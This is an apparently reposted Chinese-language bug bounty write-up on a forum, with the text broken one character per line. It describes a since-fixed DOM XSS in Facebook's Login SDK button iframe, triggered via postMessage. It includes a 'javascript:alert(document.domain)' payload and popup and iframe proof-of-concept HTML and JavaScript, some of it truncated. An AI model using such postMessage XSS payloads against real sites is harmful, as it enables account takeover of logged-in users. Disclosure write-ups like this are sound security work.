论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[2109] 2020-08-03_价值$20000的FacebookDOMXSS
文档创建者:
s7ckTeam
浏览次数:
0
最后更新:
2025-01-16
Web安全
0 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-08-03_价值$20000的FacebookDOMXSS
价
值
$
2
0
0
0
0
的
F
a
c
e
b
o
o
k
D
O
M
X
S
S
V
i
n
o
t
h
K
u
m
a
r
E
D
I
安
全
2
0
2
0
-
0
8
-
0
3
点
击
蓝
字
点
击
蓝
字
·
关
注
我
们
关
注
我
们
前
言
前
言
w
i
n
d
o
w
.
p
o
s
t
M
e
s
s
a
g
e
(
)
方
法
可
安
全
地
启
用
W
i
n
d
o
w
对
象
之
间
的
跨
域
通
信
。
例
如
,
在
页
面
与
其
产
生
的
弹
出
窗
口
之
间
,
或
在
页
面
与
嵌
入
其
中
的
i
f
r
a
m
e
之
间
。
—
—
M
o
z
i
l
l
a
p
o
s
t
M
e
s
s
a
g
e
文
档
背
景
0
1
我
认
为
通
过
p
o
s
t
M
e
s
s
a
g
e
进
行
的
D
O
M
X
S
S
是
一
个
被
低
估
的
漏
洞
,
并
且
大
多
数
漏
洞
赏
金
猎
人
都
没
有
注
意
到
它
。
最
近
,
我
开
始
研
究
客
户
端
漏
洞
,
而
不
是
查
找
打
开
的
仪
表
板
和
凭
据
(
如
果
查
看
我
的
H
a
c
k
e
r
O
n
e
报
告
,
我
的
大
多
数
报
告
都
是
打
开
的
仪
表
板
或
G
i
t
h
u
b
凭
据
泄
漏
)
。
一
开
始
我
寻
找
X
S
S
I
,
J
S
O
N
P
和
p
o
s
t
M
e
s
s
a
g
e
问
题
.
但
是
X
S
S
I
和
J
S
O
N
P
漏
洞
很
少
发
现
,
并
且
自
引
入
S
a
m
e
S
i
t
e
c
o
o
k
i
e
以
来
,
这
些
漏
洞
将
消
失
。
因
此
,
我
更
感
兴
趣
并
且
热
衷
于
研
究
p
o
s
t
M
e
s
s
a
g
e
漏
洞
,
因
为
安
全
研
究
人
员
通
常
忽
略
了
该
漏
洞
,
但
是
它
非
常
易
于
调
试
并
且
无
需
绕
过
防
火
墙
。
另
外
,
为
简
化
起
见
,
我
创
建
了
一
个
C
h
r
o
m
e
扩
展
程
序
来
查
看
记
录
第
3
页
上
发
生
的
跨
窗
口
通
信
。
通
常
,
网
站
在
小
部
件
,
插
件
或
W
e
b
S
D
K
上
使
用
i
f
r
a
m
e
通
信
。
因
此
,
当
我
开
始
向
F
a
c
e
b
o
o
k
查
找
i
f
r
a
m
e
问
题
时
,
我
立
即
转
到
h
t
t
p
s
:
/
/
d
e
l
e
v
l
o
p
e
r
s
.
f
a
c
e
.
b
o
o
k
,
开
始
研
究
F
a
c
e
b
o
o
k
的
第
三
方
插
件
。
而
且
我
注
意
到
,
该
F
a
c
e
b
o
o
k
L
o
g
i
n
S
D
K
f
o
r
J
a
v
a
S
c
r
i
p
t
创
建
了
v
6
.
p
l
u
g
i
n
s
/
l
o
g
i
n
_
b
u
t
t
o
n
.
p
h
p
用
于
跨
域
通
信
的
代
理
i
f
r
a
m
e
代
理
框
架
呈
现
C
o
n
t
i
n
u
e
w
i
t
h
F
a
c
e
b
o
o
k
按
钮
。
但
是
有
趣
的
是
J
a
v
a
S
c
r
i
p
t
S
D
K
将
初
始
化
p
a
y
l
o
a
d
发
送
到
包
含
按
钮
点
击
U
R
L
的
代
理
框
架
。
登
录
S
D
K
的
流
程
如
下
。
T
h
i
r
d
-
P
a
r
t
y
w
e
b
s
i
t
e
+
(
F
a
c
e
b
o
o
k
L
o
g
i
n
S
D
K
f
o
r
J
a
v
a
S
c
r
i
p
t
)
如
果
我
们
仔
细
研
究
有
效
负
载
,
S
D
K
将
发
送
到
F
a
c
e
b
o
o
k
插
件
i
f
r
a
m
e
,
该
u
r
l
参
数
将
下
沉
到
一
个
i
变
量
中
,
并
且
当
按
钮
c
l
i
c
k
事
件
触
发
以
下
函
数
时
,
该
函
数
将
被
执
行
。
当
我
看
到
这
个
j
a
v
a
s
c
r
i
p
t
代
码
时
,
我
很
开
心
因
为
可
以
通
过
w
i
n
d
o
w
.
o
p
e
n
(
'
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
)
D
O
M
使
用
X
S
S
,
并
且
j
a
v
a
s
c
r
i
p
t
中
没
有
u
r
l
/
s
c
h
e
m
a
验
证
。
因
此
,
如
果
我
们
将
p
a
y
l
o
a
d
与
u
r
l
:
'
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
'
一
起
发
送
到
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
6
.
0
/
p
l
u
g
i
n
s
/
l
o
g
i
n
_
b
u
t
t
o
n
.
p
h
p
i
f
r
a
m
e
,
并
且
用
户
单
击
,
则
该
C
o
n
t
i
n
u
e
w
i
t
h
F
a
c
e
b
o
o
k
按
钮
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
将
在
f
a
c
e
.
c
o
m
域
上
执
行
。
利
用
i
f
r
a
m
e
0
2
有
两
种
方
法
可
以
利
用
此
问
题
。
1
.
通
过
打
开
一
个
弹
出
窗
口
并
与
之
通
信
2
.
打
开
i
f
r
a
m
e
并
进
行
交
流
弹
出
方
法
0
3
<
i
f
r
a
m
e
s
r
c
=
'
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
6
.
0
/
p
l
u
g
i
n
s
/
l
o
g
i
n
_
b
u
t
t
o
n
.
p
h
p
?
a
p
p
_
i
d
=
A
P
P
_
I
D
&
b
u
t
t
o
n
_
t
y
p
e
=
c
o
n
t
i
n
u
e
_
w
i
t
h
&
c
h
a
n
n
e
l
=
R
E
D
I
R
E
C
T
_
U
R
L
&
s
d
k
=
j
o
e
y
<
/
i
f
r
a
m
e
>
T
h
e
F
a
c
e
b
o
o
k
J
a
v
a
s
c
r
i
p
t
S
D
K
s
e
n
d
s
t
h
e
i
n
i
t
i
a
l
p
a
y
l
o
a
d
t
o
t
h
e
i
f
r
a
m
e
p
r
o
x
y
.
i
f
r
a
m
e
.
c
o
n
t
e
n
t
W
i
n
d
o
w
.
p
o
s
t
M
e
s
s
a
g
e
(
{
"
x
d
A
r
b
i
t
e
r
H
a
n
d
l
e
M
e
s
s
a
g
e
"
:
t
r
u
e
,
"
m
e
s
s
a
g
e
"
:
{
"
m
e
t
h
o
d
"
:
"
l
o
g
i
n
B
u
t
t
o
n
S
t
a
t
e
I
n
i
t
"
'
u
r
l
'
:
'
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
7
.
0
/
d
i
a
l
o
g
/
o
a
u
t
h
?
a
p
p
_
i
d
=
A
P
P
_
I
D
&
S
O
M
E
_
O
T
H
E
R
_
P
A
R
A
M
S
'
,
'
s
i
z
e
'
:
{
'
w
i
d
t
h
'
:
1
0
,
'
h
e
i
g
h
t
'
:
1
0
}
,
'
d
i
m
s
'
:
{
'
s
c
r
e
e
n
X
'
:
0
,
'
s
c
r
e
e
n
Y
'
:
2
3
,
'
o
u
t
e
r
W
i
d
t
h
'
:
1
6
8
0
,
'
o
u
t
e
r
H
e
i
g
h
t
'
:
9
7
1
'
s
c
r
e
e
n
W
i
d
t
h
'
W
h
e
n
a
n
u
s
e
r
c
l
i
c
k
s
L
o
g
i
n
w
i
t
h
F
a
c
e
b
o
o
k
b
u
t
t
o
n
,
w
i
n
d
o
w
.
o
p
e
n
(
'
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
7
.
0
/
d
i
a
l
o
g
/
o
a
u
t
h
?
a
p
p
_
i
d
=
A
P
P
_
I
D
'
)
h
a
p
p
e
n
s
o
n
t
h
e
p
r
o
x
y
i
f
r
a
m
e
.
W
h
i
c
h
i
s
t
h
e
u
r
l
f
r
o
m
p
o
s
t
M
e
s
s
a
g
e
p
a
y
l
o
a
d
T
h
e
p
o
p
u
p
w
i
n
d
o
w
s
e
n
d
s
t
h
e
a
c
c
e
s
s
t
o
k
e
n
a
n
d
s
i
g
n
e
d
-
r
e
q
u
e
s
t
t
o
t
h
e
t
h
i
r
d
-
p
a
r
t
y
w
e
b
s
i
t
e
b
y
w
i
n
d
o
w
.
o
p
e
n
e
r
.
p
a
r
e
n
t
.
p
o
s
t
M
e
s
s
a
g
e
(
r
e
s
u
l
t
,
o
r
i
g
i
n
)
i
.
u
r
l
=
i
.
u
r
l
.
r
e
p
l
a
c
e
(
/
c
b
t
=
d
+
/
,
"
c
b
t
=
"
+
a
)
;
a
=
w
i
n
d
o
w
.
o
p
e
n
(
i
.
u
r
l
,
i
.
i
d
,
b
(
"
b
u
i
l
d
P
o
p
u
p
F
e
a
t
u
r
e
S
t
r
i
n
g
"
)
(
i
)
)
i
f
r
a
m
e
方
法
0
4
由
于
此
端
点
有
意
缺
少
'
X
-
F
r
a
m
e
-
O
p
t
i
o
n
s
'
C
S
P
'
f
r
a
m
e
-
a
n
c
e
s
t
o
r
s
'
标
头
或
C
S
P
标
头
,
因
此
该
页
面
可
以
轻
松
地
嵌
入
到
攻
击
者
的
页
面
中
。
固
定
0
5
F
a
c
e
b
o
o
k
通
过
f
a
c
e
b
o
o
k
.
c
o
m
在
p
a
y
l
o
a
d
u
r
l
参
数
中
添
加
正
则
表
达
式
域
和
架
构
检
查
来
解
决
此
问
题
。
影
响
力
0
6
由
于
错
误
的
帖
子
配
置
,
如
果
有
人
访
问
由
攻
击
者
控
制
的
网
站
并
单
击
F
a
c
e
b
o
o
k
按
钮
单
击
登
录
,
则
会
在
登
录
用
户
的
f
a
c
e
b
o
o
k
.
c
o
m
域
上
触
发
X
S
S
。
一
键
式
帐
户
接
管
就
可
以
了
时
间
线
2
0
2
0
年
4
月
1
7
日
-
已
发
送
初
次
报
告
。
2
0
2
0
年
4
月
1
7
日
-
报
告
确
认
。
2
0
2
0
年
4
月
2
0
日
–
由
F
a
c
e
b
o
o
k
推
送
修
复
。
2
0
2
0
年
4
月
2
9
日
-
F
a
c
e
b
o
o
k
确
认
修
复
。
<
s
c
r
i
p
t
>
v
a
r
o
p
e
n
e
r
=
w
i
n
d
o
w
.
o
p
e
n
(
"
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
6
.
0
/
p
l
u
g
i
n
s
/
l
o
g
i
n
_
b
u
t
t
o
n
.
p
h
p
?
a
p
p
_
i
d
=
A
P
P
_
I
D
&
a
u
t
o
_
l
o
g
o
u
t
_
l
i
n
k
=
f
a
l
s
e
&
b
u
t
t
o
n
_
t
y
p
e
=
c
o
n
t
i
n
u
e
_
w
i
t
h
&
c
h
a
n
n
e
l
=
R
E
D
I
R
E
C
T
_
U
R
L
&
c
o
n
t
a
i
n
e
r
_
w
i
d
t
h
=
7
3
4
&
l
o
c
a
l
e
=
e
n
_
U
S
&
s
d
k
=
j
o
e
y
&
s
i
z
e
=
l
a
r
g
e
&
u
s
e
_
c
o
n
t
i
n
u
e
_
a
s
=
t
r
u
e
"
s
e
t
T
i
m
e
o
u
t
(
f
u
n
c
t
i
o
n
(
)
{
v
a
r
m
e
s
s
a
g
e
=
{
"
x
d
A
r
b
i
t
e
r
H
a
n
d
l
e
M
e
s
s
a
g
e
"
:
t
r
u
e
,
"
m
e
s
s
a
g
e
"
:
{
"
m
e
t
h
o
d
"
:
"
l
o
g
i
n
B
u
t
t
o
n
S
t
a
t
e
I
n
i
t
"
,
"
p
a
r
a
m
s
"
:
o
p
e
n
e
r
.
p
o
s
t
M
e
s
s
a
g
e
(
m
e
s
s
a
g
e
,
'
*
'
)
;
}
,
'
4
0
0
0
'
)
;
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
f
b
F
r
a
m
e
L
o
a
d
e
d
(
)
{
v
a
r
i
f
r
a
m
e
E
l
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
'
f
b
f
r
a
m
e
'
)
;
v
a
r
m
e
s
s
a
g
e
=
{
"
x
d
A
r
b
i
t
e
r
H
a
n
d
l
e
M
e
s
s
a
g
e
"
:
t
r
u
e
,
"
m
e
s
s
a
g
e
"
:
{
"
m
e
t
h
o
d
"
:
"
l
o
g
i
n
B
u
t
t
o
n
S
t
a
t
e
I
n
i
t
"
,
"
p
a
r
a
m
s
"
:
J
S
O
N
.
s
t
r
i
n
g
i
f
y
i
f
r
a
m
e
E
l
.
c
o
n
t
e
n
t
W
i
n
d
o
w
.
p
o
s
t
M
e
s
s
a
g
e
(
m
e
s
s
a
g
e
,
'
*
'
)
;
}
;
<
/
s
c
r
i
p
t
>
<
i
f
r
a
m
e
i
d
=
"
f
b
f
r
a
m
e
"
s
r
c
=
"
h
t
t
p
s
:
/
/
w
w
w
.
f
a
c
e
b
o
o
k
.
c
o
m
/
v
6
.
0
/
p
l
u
g
i
n
s
/
l
o
g
i
n
_
b
u
t
t
o
n
.
p
h
p
?
a
p
p
_
i
d
=
A
P
P
_
I
D
&
a
u
t
o
_
l
o
g
o
u
t
_
l
i
n
k
=
f
a
l
s
e
&
b
u
t
t
o
n
_
t
y
p
e
=
c
o
n
t
i
n
u
e
_
w
i
t
h
&
c
h
a
n
n
e
l
=
R
E
D
I
R
E
C
T
_
U
R
L
&
c
o
n
t
a
i
n
e
r
_
w
i
d
t
h
=
7
3
4
&
l
o
c
a
l
e
=
e
n
_
U
S
&
s
d
k
=
j
o
e
y
&
s
i
z
e
=
l
a
r
g
e
&
u
s
e
_
c
o
n
t
i
n
u
e
_
a
s
=
t
r
u
e
d
=
b
(
"
i
s
F
a
c
e
b
o
o
k
U
R
I
"
)
(
n
e
w
(
g
|
|
(
g
=
b
(
"
U
R
I
"
)
)
)
(
c
.
c
a
l
l
.
u
r
l
)
)
,
j
=
c
.
c
a
l
l
;
d
|
|
(
j
.
u
r
l
=
b
(
"
X
O
A
u
t
h
E
r
r
o
r
C
o
n
t
r
o
l
l
e
r
"
)
.
g
e
t
U
R
I
B
u
i
l
d
e
r
(
)
.
s
e
t
E
n
u
m
(
"
e
r
r
o
r
_
c
o
d
e
"
,
"
P
L
A
T
F
O
R
M
_
_
I
N
V
A
L
I
D
_
U
R
L
"
)
.
g
e
t
U
R
I
2
0
2
0
年
5
月
1
日
–
2
0
0
0
0
美
元
赏
金
,
由
F
a
c
e
b
o
o
k
授
予
。
扫
码
关
注
我
们
扫
码
关
注
我
们
长
按
二
维
码
关
注
E
D
I
安
全
一
个
专
注
渗
透
实
战
经
验
分
享
的
公
众
号
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全